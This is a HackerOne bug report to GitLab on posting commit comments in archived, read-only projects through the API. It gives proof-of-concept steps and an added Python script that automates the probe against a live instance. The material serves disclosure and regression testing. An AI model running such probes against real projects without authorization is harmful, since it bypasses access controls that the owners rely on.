User Can Post Comment to Commit in Archived Project via API
HackerOne report #748209 by rafiem
on 2019-11-29, assigned to @jeremymatos:
Hi Team,
I have found an improper access control issue on archived projects. When a project is archived, the project becomes read-only, meaning that a user cannot write data to the project (for example, comments). There is no option to comment on a commit via the UI, and it is not possible to do so. But in this case, a user is still able to comment on a commit via the API endpoint.
Proof of Concept
1.) User A has a project; in this case I use the project: https://gitlab.com/bambangyera/huban
2.) User A makes some commits to the project
3.) User A then archives the project
4.) User B then tries to GET a commit SHA of the project via the API endpoint: https://gitlab.com/api/v4/projects/15590107/repository/commits/
5.) After getting the commit SHA, User B is then able to comment on the commit via a POST request with the parameter note
to the API endpoint: https://gitlab.com/api/v4/projects/15590107/repository/commits/3edb58d71c6fd95f9fb834be1364d7cf901a02c1/comments
PoC video attached:
PoC.webm
Impact
An unauthorized user is able to comment on a commit in an archived project.
Best Regards,
[@]rafiem
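The steps above amount to a three-call probe against the v4 REST API: read the project to confirm it is archived, list its commits to obtain a SHA, then POST a note to the commit comments endpoint and see whether the write is accepted. The following is an added example (not code from the report, from the reporter, or from GitLab) that turns that probe into a repeatable regression check. The endpoints are the public ones named in the report; the `ArchivedCommentCheck` class, the `Transport` callable, the `fake_transport` responses (which reuse the report's project id and commit SHA purely as sample data), and the `PRIVATE-TOKEN` header usage are this example's own assumptions.

```python
"""Check whether an archived GitLab project still accepts commit comments
through the REST API (the read-only bypass described in the report).

Added example, not the report's or GitLab's own code. The live transport
uses only the public v4 endpoints named in the report; `fake_transport`
is a constructed stand-in so the check can be run offline.
"""
import json
import os
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple

# (method, url, headers, body) -> (HTTP status, decoded JSON or None)
Transport = Callable[[str, str, Dict[str, str], Optional[bytes]], Tuple[int, object]]


def urllib_transport(method, url, headers, body):
    """Live transport over urllib; used only against a real instance."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            payload = resp.read()
            return resp.status, (json.loads(payload) if payload else None)
    except urllib.error.HTTPError as err:
        payload = err.read()
        try:
            return err.code, (json.loads(payload) if payload else None)
        except ValueError:
            return err.code, None


def fake_transport(post_status: int) -> Transport:
    """Constructed offline responses: an archived project with one commit whose
    comments endpoint answers with `post_status` (201 = write accepted,
    403 = write refused). Ids are copied from the report as sample data."""
    def transport(method, url, headers, body):
        assert headers.get("PRIVATE-TOKEN"), "request must carry User B's token"
        if method == "GET" and url.endswith("/projects/15590107"):
            return 200, {"id": 15590107, "archived": True}
        if method == "GET" and url.endswith("/repository/commits"):
            return 200, [{"id": "3edb58d71c6fd95f9fb834be1364d7cf901a02c1"}]
        if method == "POST" and url.endswith("/comments"):
            if post_status < 300:
                return post_status, {"note": urllib.parse.parse_qs(body.decode())["note"][0]}
            return post_status, {"message": "403 Forbidden"}
        return 404, {"message": "404 Not Found"}
    return transport


@dataclass
class ArchivedCommentCheck:
    base_url: str                          # e.g. "https://gitlab.com"
    token: str                             # personal access token of User B
    project_id: int                        # numeric project id, as in the report's URLs
    transport: Transport = urllib_transport

    def _call(self, method, path, form=None):
        headers = {"PRIVATE-TOKEN": self.token}
        body = None
        if form is not None:
            body = urllib.parse.urlencode(form).encode()
            headers["Content-Type"] = "application/x-www-form-urlencoded"
        return self.transport(method, f"{self.base_url}/api/v4{path}", headers, body)

    def run(self) -> dict:
        """'vulnerable' is True only when the project is archived AND the
        POST to /repository/commits/<sha>/comments is accepted (2xx)."""
        status, project = self._call("GET", f"/projects/{self.project_id}")
        if status != 200 or not isinstance(project, dict):
            return {"error": f"project lookup failed: HTTP {status}"}
        if not project.get("archived"):
            return {"archived": False, "vulnerable": False,
                    "note": "project is not archived; nothing to test"}
        status, commits = self._call("GET", f"/projects/{self.project_id}/repository/commits")
        if status != 200 or not commits:
            return {"error": f"commit listing failed: HTTP {status}"}
        sha = commits[0]["id"]
        status, _ = self._call(
            "POST",
            f"/projects/{self.project_id}/repository/commits/{sha}/comments",
            form={"note": "archived-project write check"},
        )
        return {"archived": True, "sha": sha, "post_status": status,
                "vulnerable": 200 <= status < 300}


if __name__ == "__main__":
    # Live run: GITLAB_URL, GITLAB_TOKEN and PROJECT_ID must be set in the environment.
    check = ArchivedCommentCheck(
        os.environ.get("GITLAB_URL", "https://gitlab.com"),
        os.environ["GITLAB_TOKEN"],
        int(os.environ["PROJECT_ID"]),
    )
    print(json.dumps(check.run(), indent=2))
```

The check deliberately refuses to draw a conclusion unless the project really is archived, so a "not vulnerable" result cannot come from probing an unarchived project by mistake. A fixed server is expected to refuse the POST (a 403 in the constructed responses here); any 2xx on the comments endpoint of an archived project is the behaviour the report describes. The same pattern can be pointed at other write endpoints of an archived project by changing the final path and form parameters.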
Attachments
Warning: Attachments received through HackerOne, please exercise caution!